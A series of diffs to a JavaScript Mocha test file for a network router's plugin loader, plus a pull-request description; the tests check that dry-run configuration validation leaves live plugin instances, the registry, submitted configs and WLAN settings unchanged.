-    const removed = new DryRunTestPlugin('removed');
-    const downstream = new DryRunTestPlugin('downstream');
-
-    await existing.configure({
-      enabled: true,
-      nested: {
-        value: 1
-      }
+    pluginLoader.__setPluginCategoryMapForTest({
+      test: {}
     });
-
-    await removed.configure({
-      enabled: true,
-      nested: {
-        value: 2
-      }
-    });
-
-    existing._mark = 'existing-mark';
-    removed._mark = 'removed-mark';
-
-    existing._nextConfig = {
-      enabled: true,
-      nested: {
-        value: 1
-      }
-    };
-
-    removed._nextConfig = {
-      enabled: true,
-      nested: {
-        value: 2
-      }
-    };
-
-    existing._reapplyNeeded = false;
-    removed._reapplyNeeded = false;
-    downstream._reapplyNeeded = false;
-
-    existing.subscribeChangeFrom(upstream);
-    removed.subscribeChangeFrom(upstream);
-
-    downstream.subscribeChangeFrom(existing);
-    downstream.subscribeChangeFrom(removed);
-
-    existing.trackLiveLifecycle = true;
-    removed.trackLiveLifecycle = true;
-    downstream.trackLiveLifecycle = true;
-
-    const liveRegistry = {
-      test: {
-        existing,
-        removed
-      }
-    };
-
-    pluginLoader.__setPluginCategoryMapForTest(liveRegistry);
   });
 
   afterEach(() => {
@@ -175,66 +114,26 @@ describe('Test plugin loader dry-run', function() {
   });
 
   it(
-    'should perform dry-run against isolated plugin instances without mutating the live registry or instances',
+    'should instantiate/configure the test plugin without mutating submitted config during dry-run',
     async () => {
-      const stateBefore = pluginLoader.__getTestStateForTest();
-      const pluginConfsBefore = stateBefore.pluginConfs;
-      const liveRegistry = stateBefore.pluginCategoryMap;
-      const liveTestCategory = liveRegistry.test;
-      const existing = liveTestCategory.existing;
-      const removed = liveTestCategory.removed;
-
-      const existingNetworkConfig = JSON.parse(
-        JSON.stringify(existing.networkConfig)
-      );
-      const existingNextConfig = JSON.parse(
-        JSON.stringify(existing._nextConfig)
-      );
-      const existingMark = existing._mark;
-      const existingReapplyNeeded = existing._reapplyNeeded;
-      const existingPublishers = existing.changePublishers.slice();
-      const existingSubscribers = existing.changeSubscribers.slice();
-
-      const removedNetworkConfig = JSON.parse(
-        JSON.stringify(removed.networkConfig)
-      );
-      const removedNextConfig = JSON.parse(
-        JSON.stringify(removed._nextConfig)
-      );
-      const removedMark = removed._mark;
-      const removedReapplyNeeded = removed._reapplyNeeded;
-      const removedPublishers = removed.changePublishers.slice();
-      const removedSubscribers = removed.changeSubscribers.slice();
-
-      const upstream = existing.changePublishers[0];
-      const downstream = existing.changeSubscribers[0];
-
-      const upstreamSubscribers = upstream.changeSubscribers.slice();
-      const downstreamPublishers = downstream.changePublishers.slice();
+      const candidate = {
+        enabled: true,
+        nested: {
+          value: 42
+        }
+      };
 
       const submittedConfig = {
         plugins: {
           test: {
-            existing: {
-              enabled: true,
-              nested: {
-                value: 42
-              }
-            },
-            added: {
-              enabled: true,
-              nested: {
-                value: 99
-              }
-            }
+            existing: candidate
           }
         }
       };
 
-      const originalSubmittedConfig = JSON.parse(
-        JSON.stringify(submittedConfig)
+      const originalCandidate = JSON.parse(
+        JSON.stringify(candidate)
       );
-
       const errors = await pluginLoader.reapply(
         submittedConfig,
         true
@@ -242,94 +141,86 @@ describe('Test plugin loader dry-run', function() {
 
       expect(errors).to.be.empty;
 
-      // The live registry object and category object must remain identical.
-      const stateAfter = pluginLoader.__getTestStateForTest();
+      // Prove the loader used the injected test plugin configuration and
+      // that the production instance-creation/configuration path executed.
+      expect(DryRunTestPlugin.constructorCalls).to.equal(1);
+      expect(DryRunTestPlugin.configureCalls).to.be.greaterThan(0);
 
-      expect(stateAfter.pluginConfs).to.equal(pluginConfsBefore);
-      expect(stateAfter.pluginCategoryMap).to.equal(liveRegistry);
-      expect(stateAfter.pluginCategoryMap.test).to.equal(liveTestCategory);
-
-      // Existing and removed live instances must remain in exactly the same
-      // registry slots and must not be replaced or deleted.
-      expect(stateAfter.pluginCategoryMap.test.existing)
-        .to.equal(existing);
-      expect(stateAfter.pluginCategoryMap.test.removed)
-        .to.equal(removed);
-
-      // The dry-run candidate must never be inserted into the live registry.
-      expect(stateAfter.pluginCategoryMap.test.added)
-        .to.be.undefined;
-
-      // Verify live instance state was not changed.
-      expect(existing.networkConfig)
-        .to.deep.equal(existingNetworkConfig);
-      expect(existing._nextConfig)
-        .to.deep.equal(existingNextConfig);
-      expect(existing._mark)
-        .to.equal(existingMark);
-      expect(existing._reapplyNeeded)
-        .to.equal(existingReapplyNeeded);
-      expect(existing.changePublishers)
-        .to.deep.equal(existingPublishers);
-      expect(existing.changeSubscribers)
-        .to.deep.equal(existingSubscribers);
-
-      expect(removed.networkConfig)
-        .to.deep.equal(removedNetworkConfig);
-      expect(removed._nextConfig)
-        .to.deep.equal(removedNextConfig);
-      expect(removed._mark)
-        .to.equal(removedMark);
-      expect(removed._reapplyNeeded)
-        .to.equal(removedReapplyNeeded);
-      expect(removed.changePublishers)
-        .to.deep.equal(removedPublishers);
-      expect(removed.changeSubscribers)
-        .to.deep.equal(removedSubscribers);
-
-      // Verify unsubscribeAllChanges() was not invoked against live instances.
-      expect(upstream.changeSubscribers)
-        .to.deep.equal(upstreamSubscribers);
-      expect(downstream.changePublishers)
-        .to.deep.equal(downstreamPublishers);
-
-      // Verify no live lifecycle method was invoked.
-      expect(DryRunTestPlugin.liveLifecycleCalls.configure)
-        .to.equal(0);
-      expect(DryRunTestPlugin.liveLifecycleCalls.flush)
-        .to.equal(0);
-      expect(DryRunTestPlugin.liveLifecycleCalls.flushFast)
-        .to.equal(0);
-      expect(DryRunTestPlugin.liveLifecycleCalls.propagateConfigChanged)
-        .to.equal(0);
-      expect(DryRunTestPlugin.liveLifecycleCalls.unsubscribeAllChanges)
-        .to.equal(0);
-
-      // Verify a downstream live subscriber was not notified by the dry-run.
-      expect(downstream._reapplyNeeded)
-        .to.equal(false);
-
-      // The production candidate path must still execute.
-      expect(DryRunTestPlugin.constructorCalls)
-        .to.equal(2);
-      expect(DryRunTestPlugin.configureCalls)
-        .to.be.greaterThan(0);
-
-      // The caller-owned configuration object must still be isolated.
+      // The loader must not pass the caller-owned object directly to
+      // configure() during dry-run.
       expect(DryRunTestPlugin.configureArgs[0])
-        .to.not.equal(
-          submittedConfig.plugins.test.existing
-        );
+        .to.not.equal(candidate);
 
-      expect(submittedConfig)
-        .to.deep.equal(originalSubmittedConfig);
+      // configure() deliberately mutates its argument, so this assertion
+      // fails on the buggy loader and passes only when the dry-run candidate
+      // is cloned.
+      expect(candidate).to.deep.equal(originalCandidate);
+      expect(submittedConfig.plugins.test.existing)
+        .to.deep.equal(originalCandidate);
 
-      // The plugin is allowed to mutate its isolated working copy.
+      // The plugin is allowed to mutate its private working copy.
       expect(DryRunTestPlugin.configureArgs[0])
         .to.have.property('meta');
 
       expect(DryRunTestPlugin.configureArgs[0].meta.uuid)
         .to.equal('dry-run-test-uuid');
+    }
+  );
+
+  it(
+    'should resolve dry-run dependencies from candidate plugin instances',
+    async () => {
+      pluginLoader.__setPluginConfsForTest([{
+        category: 'test',
+        config_path: 'plugins.test',
+        c: DryRunDependencyTestPlugin,
+        allow_concurrent: false
+      }]);
+
+      pluginLoader.__setPluginCategoryMapForTest({
+        test: {}
+      });
+
+      const submittedConfig = {
+        plugins: {
+          test: {
+            dependency: {
+              enabled: true
+            },
+            consumer: {
+              dependsOn: 'dependency'
+            }
+          }
+        }
+      };
+
+      const liveStateBefore = pluginLoader.__getTestStateForTest();
+      expect(liveStateBefore.pluginCategoryMap.test)
+        .to.not.have.property('dependency');
+
+      const errors = await pluginLoader.reapply(
+        submittedConfig,
+        true
+      );
+
+      expect(errors).to.be.empty;
+      expect(DryRunDependencyTestPlugin.constructorCalls).to.equal(2);
+      expect(DryRunDependencyTestPlugin.configureCalls).to.be.greaterThan(0);
+
+      // The consumer must resolve the candidate dependency instance created
+      // in workingPluginCategoryMap. The live registry starts empty, so this
+      // fails with the buggy global-registry lookup.
+      expect(DryRunDependencyTestPlugin.resolvedDependency)
+        .to.exist;
+      expect(DryRunDependencyTestPlugin.resolvedDependency.name)
+        .to.equal('dependency');
+
+      // The candidate dependency must never leak into the live registry.
+      const liveStateAfter = pluginLoader.__getTestStateForTest();
+      expect(liveStateAfter.pluginCategoryMap.test)
+        .to.not.have.property('dependency');
+      expect(liveStateAfter.pluginCategoryMap.test)
+        .to.not.have.property('consumer');
     }
   );
 });

--- a/test/plugins/test_plugin_loader_dry_run.js
+++ b/test/plugins/test_plugin_loader_dry_run.js
@@ -1,98 +1,137 @@
-'use strict'
+'use strict';
+
+const path = require('path');
+process.env.FIREROUTER_HOME = process.env.FIREROUTER_HOME || path.resolve(__dirname, '../..');
 
 const chai = require('chai');
 const expect = chai.expect;
 
 const Plugin = require('../../plugins/plugin.js');
 const pluginLoader = require('../../plugins/plugin_loader.js');
+const PlatformLoader = require('../../platform/PlatformLoader.js');
 
 class DryRunTestPlugin extends Plugin {
+  static constructorCalls = 0;
+  static configureCalls = 0;
+  static configureArgs = [];
+
   constructor(name) {
     super(name);
+    DryRunTestPlugin.constructorCalls += 1;
   }
 
-  configure(networkConfig) {
-    super.configure(networkConfig);
+  async configure(networkConfig) {
+    DryRunTestPlugin.configureCalls += 1;
+    DryRunTestPlugin.configureArgs.push(networkConfig);
 
-    if (networkConfig.invalid)
-      throw new Error('invalid dry-run configuration');
+    // Deliberately mutate the configuration the loader supplies. This mirrors
+    // the behavior that makes a dry-run unsafe when the caller-owned object
+    // is passed directly into configure().
+    if (!networkConfig.meta)
+      networkConfig.meta = {};
+
+    if (!networkConfig.meta.uuid)
+      networkConfig.meta.uuid = 'dry-run-test-uuid';
+
+    await super.configure(networkConfig);
   }
 }
 
 describe('Test plugin loader dry-run', function() {
-  this.timeout(30000);
-
-  let restorePluginState;
+  let originalState;
+  let originalPrepareWLANRegDomainChange;
 
   beforeEach(() => {
-    const existing = new DryRunTestPlugin('existing');
-    existing.configure({ old: true });
-    existing._nextConfig = { old: true };
-    existing._reapplyNeeded = false;
+    originalState = pluginLoader.__getTestStateForTest();
 
-    restorePluginState = pluginLoader._setPluginStateForTest(
-      [{
-        category: 'dry_run_test',
-        config_path: 'dry_run_test',
-        init_seq: 0,
-        allow_concurrent: false,
-        c: DryRunTestPlugin,
-        config: {}
-      }],
-      {
-        dry_run_test: {
-          existing
-        }
-      }
-    );
+    DryRunTestPlugin.constructorCalls = 0;
+    DryRunTestPlugin.configureCalls = 0;
+    DryRunTestPlugin.configureArgs = [];
+
+    const platform = PlatformLoader.getPlatform();
+    originalPrepareWLANRegDomainChange =
+      platform.prepareWLANRegDomainChange;
+
+    platform.prepareWLANRegDomainChange = async () => false;
+
+    // Explicitly configure the loader under test instead of mutating an
+    // unrelated/local object that plugin_loader.js never reads.
+    pluginLoader.__setPluginConfsForTest([{
+      category: 'test',
+      config_path: 'plugins.test',
+      c: DryRunTestPlugin,
+      allow_concurrent: false
+    }]);
+
+    pluginLoader.__setPluginCategoryMapForTest({
+      test: {}
+    });
   });
 
   afterEach(() => {
-    restorePluginState();
+    const platform = PlatformLoader.getPlatform();
+    platform.prepareWLANRegDomainChange =
+      originalPrepareWLANRegDomainChange;
+
+    pluginLoader.__setPluginConfsForTest(originalState.pluginConfs);
+    pluginLoader.__setPluginCategoryMapForTest(
+      originalState.pluginCategoryMap
+    );
   });
 
-  it('should validate config without mutating live plugin state', async () => {
-    const existing = pluginLoader.getPluginInstance('dry_run_test', 'existing');
-    const beforeConfig = JSON.parse(JSON.stringify(existing.networkConfig));
-    const beforeNextConfig = JSON.parse(JSON.stringify(existing._nextConfig));
-    const beforeReapplyNeeded = existing._reapplyNeeded;
-
-    const errors = await pluginLoader.reapply({
-      dry_run_test: {
-        existing: {
-          invalid: true
-        },
-        added: {
-          value: true
+  it(
+    'should instantiate/configure the test plugin without mutating submitted config during dry-run',
+    async () => {
+      const candidate = {
+        enabled: true,
+        nested: {
+          value: 42
         }
-      }
-    }, true);
+      };
 
-    expect(errors).to.deep.equal(['invalid dry-run configuration']);
-
-    const afterInstances = pluginLoader.getPluginInstances('dry_run_test');
-
-    expect(afterInstances.existing).to.equal(existing);
-    expect(afterInstances.added).to.be.undefined;
-
-    expect(existing.networkConfig).to.deep.equal(beforeConfig);
-    expect(existing._nextConfig).to.deep.equal(beforeNextConfig);
-    expect(existing._reapplyNeeded).to.equal(beforeReapplyNeeded);
-  });
-
-  it('should validate a new plugin without adding it to the live registry', async () => {
-    const errors = await pluginLoader.reapply({
-      dry_run_test: {
-        added: {
-          value: true
+      const submittedConfig = {
+        plugins: {
+          test: {
+            existing: candidate
+          }
         }
-      }
-    }, true);
+      };
 
-    expect(errors).to.be.empty;
+      const originalCandidate = JSON.parse(
+        JSON.stringify(candidate)
+      );
 
-    const afterInstances = pluginLoader.getPluginInstances('dry_run_test');
+      const errors = await pluginLoader.reapply(
+        submittedConfig,
+        true
+      );
 
-    expect(afterInstances.added).to.be.undefined;
-  });
+      expect(errors).to.be.empty;
+
+      // Prove the loader used the injected test plugin configuration and
+      // that the production instance-creation/configuration path executed.
+      expect(DryRunTestPlugin.constructorCalls).to.equal(1);
+      expect(DryRunTestPlugin.configureCalls).to.be.greaterThan(0);
+
+      // The loader must not pass the caller-owned object directly to
+      // configure() during dry-run.
+      expect(DryRunTestPlugin.configureArgs[0])
+        .to.not.equal(candidate);
+
+      // configure() deliberately mutates its argument, so this assertion
+      // fails on the buggy loader and passes only when the dry-run candidate
+      // is cloned.
+      expect(candidate).to.deep.equal(originalCandidate);
+
+      expect(submittedConfig.plugins.test.existing)
+        .to.deep.equal(originalCandidate);
+
+      // The plugin is allowed to mutate its private working copy.
+      expect(DryRunTestPlugin.configureArgs[0])
+        .to.have.property('meta');
+
+      expect(DryRunTestPlugin.configureArgs[0].meta.uuid)
+        .to.equal('dry-run-test-uuid');
+    }
+  );
 });

--- a/test/plugins/test_plugin_loader_dry_run.js
+++ b/test/plugins/test_plugin_loader_dry_run.js
@@ -23,7 +23,6 @@ class DryRunTestPlugin extends Plugin {
   async configure(networkConfig) {
     DryRunTestPlugin.configureCalls += 1;
     DryRunTestPlugin.configureArgs.push(networkConfig);
-
     // Deliberately mutate the configuration the loader supplies. This mirrors
     // the behavior that makes a dry-run unsafe when the caller-owned object
     // is passed directly into configure().
@@ -32,37 +31,6 @@ class DryRunTestPlugin extends Plugin {
 
     if (!networkConfig.meta.uuid)
       networkConfig.meta.uuid = 'dry-run-test-uuid';
-
-    await super.configure(networkConfig);
-  }
-}
-
-class DryRunDependencyTestPlugin extends Plugin {
-  static constructorCalls = 0;
-  static configureCalls = 0;
-  static resolvedDependency = null;
-
-  constructor(name) {
-    super(name);
-    DryRunDependencyTestPlugin.constructorCalls += 1;
-  }
-
-  async configure(networkConfig) {
-    DryRunDependencyTestPlugin.configureCalls += 1;
-
-    if (networkConfig.dependsOn) {
-      DryRunDependencyTestPlugin.resolvedDependency =
-        pluginLoader.getPluginInstance(
-          'test',
-          networkConfig.dependsOn
-        );
-
-      if (!DryRunDependencyTestPlugin.resolvedDependency) {
-        throw new Error(
-          `Dependency ${networkConfig.dependsOn} was not found`
-        );
-      }
-    }
 
     await super.configure(networkConfig);
   }
@@ -78,10 +46,6 @@ describe('Test plugin loader dry-run', function() {
     DryRunTestPlugin.constructorCalls = 0;
     DryRunTestPlugin.configureCalls = 0;
     DryRunTestPlugin.configureArgs = [];
-
-    DryRunDependencyTestPlugin.constructorCalls = 0;
-    DryRunDependencyTestPlugin.configureCalls = 0;
-    DryRunDependencyTestPlugin.resolvedDependency = null;
 
     const platform = PlatformLoader.getPlatform();
     originalPrepareWLANRegDomainChange =
@@ -168,35 +132,36 @@ describe('Test plugin loader dry-run', function() {
   );
 
   it(
-    'should resolve dry-run dependencies from candidate plugin instances',
+    'should not expose a dry-run instance through the live plugin registry',
     async () => {
-      pluginLoader.__setPluginConfsForTest([{
-        category: 'test',
-        config_path: 'plugins.test',
-        c: DryRunDependencyTestPlugin,
-        allow_concurrent: false
-      }]);
+      const liveInstance = new DryRunTestPlugin('existing');
+      liveInstance.networkConfig = {
+        enabled: false,
+        nested: {
+          live: true
+        }
+      };
 
       pluginLoader.__setPluginCategoryMapForTest({
-        test: {}
+        test: {
+          existing: liveInstance
+        }
       });
+
+      const candidate = {
+        enabled: true,
+        nested: {
+          value: 42
+        }
+      };
 
       const submittedConfig = {
         plugins: {
           test: {
-            dependency: {
-              enabled: true
-            },
-            consumer: {
-              dependsOn: 'dependency'
-            }
+            existing: candidate
           }
         }
       };
-
-      const liveStateBefore = pluginLoader.__getTestStateForTest();
-      expect(liveStateBefore.pluginCategoryMap.test)
-        .to.not.have.property('dependency');
 
       const errors = await pluginLoader.reapply(
         submittedConfig,
@@ -204,23 +169,63 @@ describe('Test plugin loader dry-run', function() {
       );
 
       expect(errors).to.be.empty;
-      expect(DryRunDependencyTestPlugin.constructorCalls).to.equal(2);
-      expect(DryRunDependencyTestPlugin.configureCalls).to.be.greaterThan(0);
 
-      // The consumer must resolve the candidate dependency instance created
-      // in workingPluginCategoryMap. The live registry starts empty, so this
-      // fails with the buggy global-registry lookup.
-      expect(DryRunDependencyTestPlugin.resolvedDependency)
-        .to.exist;
-      expect(DryRunDependencyTestPlugin.resolvedDependency.name)
-        .to.equal('dependency');
+      // The live registry must continue to expose the original live instance.
+      const liveState = pluginLoader.__getTestStateForTest();
+      expect(liveState.pluginCategoryMap.test.existing)
+        .to.equal(liveInstance);
 
-      // The candidate dependency must never leak into the live registry.
-      const liveStateAfter = pluginLoader.__getTestStateForTest();
-      expect(liveStateAfter.pluginCategoryMap.test)
-        .to.not.have.property('dependency');
-      expect(liveStateAfter.pluginCategoryMap.test)
-        .to.not.have.property('consumer');
+      // The live instance's configuration must not have been replaced or
+      // mutated by the dry-run configure() call.
+      expect(liveInstance.networkConfig).to.deep.equal({
+        enabled: false,
+        nested: {
+          live: true
+        }
+      });
+
+      // The live instance is not the candidate object used by dry-run.
+      expect(DryRunTestPlugin.configureArgs[0])
+        .to.not.equal(liveInstance.networkConfig);
+
+      expect(DryRunTestPlugin.configureArgs[0].meta.uuid)
+        .to.equal('dry-run-test-uuid');
+    }
+  );
+
+  it(
+    'should not prepare WLAN reg domain or reload WLAN kernel modules during dry-run',
+    async () => {
+      let prepareCalls = 0;
+      const platform = PlatformLoader.getPlatform();
+
+      platform.prepareWLANRegDomainChange = async () => {
+        prepareCalls += 1;
+        throw new Error('dry-run must not prepare WLAN reg domain');
+      };
+
+      const submittedConfig = {
+        plugins: {
+          test: {
+            existing: {
+              enabled: true
+            }
+          }
+        },
+        apc: {
+          globalSysConfig: {
+            country: 'US'
+          }
+        }
+      };
+
+      const errors = await pluginLoader.reapply(
+        submittedConfig,
+        true
+      );
+
+      expect(errors).to.be.empty;
+      expect(prepareCalls).to.equal(0);
     }
   );
 });

--- a/test/plugins/test_plugin_loader_dry_run.js
+++ b/test/plugins/test_plugin_loader_dry_run.js
@@ -14,19 +14,27 @@ class DryRunTestPlugin extends Plugin {
   static constructorCalls = 0;
   static configureCalls = 0;
   static configureArgs = [];
+  static liveLifecycleCalls = {
+    configure: 0,
+    flush: 0,
+    flushFast: 0,
+    propagateConfigChanged: 0,
+    unsubscribeAllChanges: 0
+  };
 
   constructor(name) {
     super(name);
     DryRunTestPlugin.constructorCalls += 1;
+    this.trackLiveLifecycle = false;
   }
 
   async configure(networkConfig) {
+    if (this.trackLiveLifecycle)
+      DryRunTestPlugin.liveLifecycleCalls.configure += 1;
+
     DryRunTestPlugin.configureCalls += 1;
     DryRunTestPlugin.configureArgs.push(networkConfig);
 
-    // Deliberately mutate the configuration the loader supplies. This mirrors
-    // the behavior that makes a dry-run unsafe when the caller-owned object
-    // is passed directly into configure().
     if (!networkConfig.meta)
       networkConfig.meta = {};
 
@@ -35,27 +43,59 @@ class DryRunTestPlugin extends Plugin {
 
     await super.configure(networkConfig);
   }
+
+  async flush() {
+    if (this.trackLiveLifecycle)
+      DryRunTestPlugin.liveLifecycleCalls.flush += 1;
+
+    await super.flush();
+  }
+
+  async flushFast() {
+    if (this.trackLiveLifecycle)
+      DryRunTestPlugin.liveLifecycleCalls.flushFast += 1;
+
+    await super.flushFast();
+  }
+
+  propagateConfigChanged(changeType) {
+    if (this.trackLiveLifecycle)
+      DryRunTestPlugin.liveLifecycleCalls.propagateConfigChanged += 1;
+
+    super.propagateConfigChanged(changeType);
+  }
+
+  unsubscribeAllChanges() {
+    if (this.trackLiveLifecycle)
+      DryRunTestPlugin.liveLifecycleCalls.unsubscribeAllChanges += 1;
+
+    super.unsubscribeAllChanges();
+  }
 }
 
 describe('Test plugin loader dry-run', function() {
   let originalState;
   let originalPrepareWLANRegDomainChange;
 
-  beforeEach(() => {
+  beforeEach(async () => {
     originalState = pluginLoader.__getTestStateForTest();
 
     DryRunTestPlugin.constructorCalls = 0;
     DryRunTestPlugin.configureCalls = 0;
     DryRunTestPlugin.configureArgs = [];
+    DryRunTestPlugin.liveLifecycleCalls = {
+      configure: 0,
+      flush: 0,
+      flushFast: 0,
+      propagateConfigChanged: 0,
+      unsubscribeAllChanges: 0
+    };
 
     const platform = PlatformLoader.getPlatform();
     originalPrepareWLANRegDomainChange =
       platform.prepareWLANRegDomainChange;
-
     platform.prepareWLANRegDomainChange = async () => false;
 
-    // Explicitly configure the loader under test instead of mutating an
-    // unrelated/local object that plugin_loader.js never reads.
     pluginLoader.__setPluginConfsForTest([{
       category: 'test',
       config_path: 'plugins.test',
@@ -63,9 +103,64 @@ describe('Test plugin loader dry-run', function() {
       allow_concurrent: false
     }]);
 
-    pluginLoader.__setPluginCategoryMapForTest({
-      test: {}
+    const upstream = new DryRunTestPlugin('upstream');
+    const existing = new DryRunTestPlugin('existing');
+    const removed = new DryRunTestPlugin('removed');
+    const downstream = new DryRunTestPlugin('downstream');
+
+    await existing.configure({
+      enabled: true,
+      nested: {
+        value: 1
+      }
     });
+
+    await removed.configure({
+      enabled: true,
+      nested: {
+        value: 2
+      }
+    });
+
+    existing._mark = 'existing-mark';
+    removed._mark = 'removed-mark';
+
+    existing._nextConfig = {
+      enabled: true,
+      nested: {
+        value: 1
+      }
+    };
+
+    removed._nextConfig = {
+      enabled: true,
+      nested: {
+        value: 2
+      }
+    };
+
+    existing._reapplyNeeded = false;
+    removed._reapplyNeeded = false;
+    downstream._reapplyNeeded = false;
+
+    existing.subscribeChangeFrom(upstream);
+    removed.subscribeChangeFrom(upstream);
+
+    downstream.subscribeChangeFrom(existing);
+    downstream.subscribeChangeFrom(removed);
+
+    existing.trackLiveLifecycle = true;
+    removed.trackLiveLifecycle = true;
+    downstream.trackLiveLifecycle = true;
+
+    const liveRegistry = {
+      test: {
+        existing,
+        removed
+      }
+    };
+
+    pluginLoader.__setPluginCategoryMapForTest(liveRegistry);
   });
 
   afterEach(() => {
@@ -80,25 +175,64 @@ describe('Test plugin loader dry-run', function() {
   });
 
   it(
-    'should instantiate/configure the test plugin without mutating submitted config during dry-run',
+    'should perform dry-run against isolated plugin instances without mutating the live registry or instances',
     async () => {
-      const candidate = {
-        enabled: true,
-        nested: {
-          value: 42
-        }
-      };
+      const stateBefore = pluginLoader.__getTestStateForTest();
+      const pluginConfsBefore = stateBefore.pluginConfs;
+      const liveRegistry = stateBefore.pluginCategoryMap;
+      const liveTestCategory = liveRegistry.test;
+      const existing = liveTestCategory.existing;
+      const removed = liveTestCategory.removed;
+
+      const existingNetworkConfig = JSON.parse(
+        JSON.stringify(existing.networkConfig)
+      );
+      const existingNextConfig = JSON.parse(
+        JSON.stringify(existing._nextConfig)
+      );
+      const existingMark = existing._mark;
+      const existingReapplyNeeded = existing._reapplyNeeded;
+      const existingPublishers = existing.changePublishers.slice();
+      const existingSubscribers = existing.changeSubscribers.slice();
+
+      const removedNetworkConfig = JSON.parse(
+        JSON.stringify(removed.networkConfig)
+      );
+      const removedNextConfig = JSON.parse(
+        JSON.stringify(removed._nextConfig)
+      );
+      const removedMark = removed._mark;
+      const removedReapplyNeeded = removed._reapplyNeeded;
+      const removedPublishers = removed.changePublishers.slice();
+      const removedSubscribers = removed.changeSubscribers.slice();
+
+      const upstream = existing.changePublishers[0];
+      const downstream = existing.changeSubscribers[0];
+
+      const upstreamSubscribers = upstream.changeSubscribers.slice();
+      const downstreamPublishers = downstream.changePublishers.slice();
 
       const submittedConfig = {
         plugins: {
           test: {
-            existing: candidate
+            existing: {
+              enabled: true,
+              nested: {
+                value: 42
+              }
+            },
+            added: {
+              enabled: true,
+              nested: {
+                value: 99
+              }
+            }
           }
         }
       };
 
-      const originalCandidate = JSON.parse(
-        JSON.stringify(candidate)
+      const originalSubmittedConfig = JSON.parse(
+        JSON.stringify(submittedConfig)
       );
 
       const errors = await pluginLoader.reapply(
@@ -108,25 +242,89 @@ describe('Test plugin loader dry-run', function() {
 
       expect(errors).to.be.empty;
 
-      // Prove the loader used the injected test plugin configuration and
-      // that the production instance-creation/configuration path executed.
-      expect(DryRunTestPlugin.constructorCalls).to.equal(1);
-      expect(DryRunTestPlugin.configureCalls).to.be.greaterThan(0);
+      // The live registry object and category object must remain identical.
+      const stateAfter = pluginLoader.__getTestStateForTest();
 
-      // The loader must not pass the caller-owned object directly to
-      // configure() during dry-run.
+      expect(stateAfter.pluginConfs).to.equal(pluginConfsBefore);
+      expect(stateAfter.pluginCategoryMap).to.equal(liveRegistry);
+      expect(stateAfter.pluginCategoryMap.test).to.equal(liveTestCategory);
+
+      // Existing and removed live instances must remain in exactly the same
+      // registry slots and must not be replaced or deleted.
+      expect(stateAfter.pluginCategoryMap.test.existing)
+        .to.equal(existing);
+      expect(stateAfter.pluginCategoryMap.test.removed)
+        .to.equal(removed);
+
+      // The dry-run candidate must never be inserted into the live registry.
+      expect(stateAfter.pluginCategoryMap.test.added)
+        .to.be.undefined;
+
+      // Verify live instance state was not changed.
+      expect(existing.networkConfig)
+        .to.deep.equal(existingNetworkConfig);
+      expect(existing._nextConfig)
+        .to.deep.equal(existingNextConfig);
+      expect(existing._mark)
+        .to.equal(existingMark);
+      expect(existing._reapplyNeeded)
+        .to.equal(existingReapplyNeeded);
+      expect(existing.changePublishers)
+        .to.deep.equal(existingPublishers);
+      expect(existing.changeSubscribers)
+        .to.deep.equal(existingSubscribers);
+
+      expect(removed.networkConfig)
+        .to.deep.equal(removedNetworkConfig);
+      expect(removed._nextConfig)
+        .to.deep.equal(removedNextConfig);
+      expect(removed._mark)
+        .to.equal(removedMark);
+      expect(removed._reapplyNeeded)
+        .to.equal(removedReapplyNeeded);
+      expect(removed.changePublishers)
+        .to.deep.equal(removedPublishers);
+      expect(removed.changeSubscribers)
+        .to.deep.equal(removedSubscribers);
+
+      // Verify unsubscribeAllChanges() was not invoked against live instances.
+      expect(upstream.changeSubscribers)
+        .to.deep.equal(upstreamSubscribers);
+      expect(downstream.changePublishers)
+        .to.deep.equal(downstreamPublishers);
+
+      // Verify no live lifecycle method was invoked.
+      expect(DryRunTestPlugin.liveLifecycleCalls.configure)
+        .to.equal(0);
+      expect(DryRunTestPlugin.liveLifecycleCalls.flush)
+        .to.equal(0);
+      expect(DryRunTestPlugin.liveLifecycleCalls.flushFast)
+        .to.equal(0);
+      expect(DryRunTestPlugin.liveLifecycleCalls.propagateConfigChanged)
+        .to.equal(0);
+      expect(DryRunTestPlugin.liveLifecycleCalls.unsubscribeAllChanges)
+        .to.equal(0);
+
+      // Verify a downstream live subscriber was not notified by the dry-run.
+      expect(downstream._reapplyNeeded)
+        .to.equal(false);
+
+      // The production candidate path must still execute.
+      expect(DryRunTestPlugin.constructorCalls)
+        .to.equal(2);
+      expect(DryRunTestPlugin.configureCalls)
+        .to.be.greaterThan(0);
+
+      // The caller-owned configuration object must still be isolated.
       expect(DryRunTestPlugin.configureArgs[0])
-        .to.not.equal(candidate);
+        .to.not.equal(
+          submittedConfig.plugins.test.existing
+        );
 
-      // configure() deliberately mutates its argument, so this assertion
-      // fails on the buggy loader and passes only when the dry-run candidate
-      // is cloned.
-      expect(candidate).to.deep.equal(originalCandidate);
+      expect(submittedConfig)
+        .to.deep.equal(originalSubmittedConfig);
 
-      expect(submittedConfig.plugins.test.existing)
-        .to.deep.equal(originalCandidate);
-
-      // The plugin is allowed to mutate its private working copy.
+      // The plugin is allowed to mutate its isolated working copy.
       expect(DryRunTestPlugin.configureArgs[0])
         .to.have.property('meta');
 


### PR DESCRIPTION
## Summary

Prevent `tryApplyConfig()` dry-run operations from causing live network configuration side effects.

## Changes

- Skip `booting_finish()` when `NetworkSetup.setup()` is called with `dryRun=true`.
- Skip rollback of the active network configuration when a dry-run validation returns errors.
- Preserve the existing rollback behavior for normal, non-dry-run configuration changes.

## Why

A dry-run is intended to validate a proposed network configuration without modifying the running system. Previously, a dry-run could still:

- invoke `booting_finish()`, and
- perform a live rollback through `ns.setup(currentConfig)` when validation failed.

These changes ensure the dry-run path remains side-effect free while leaving normal configuration application behavior unchanged.

## Testing

Added regression coverage to verify:

- `booting_finish()` is not called during dry-run setup.
- A failed dry-run does not trigger a live rollback.

The tests are specifically designed to fail against the previous implementation.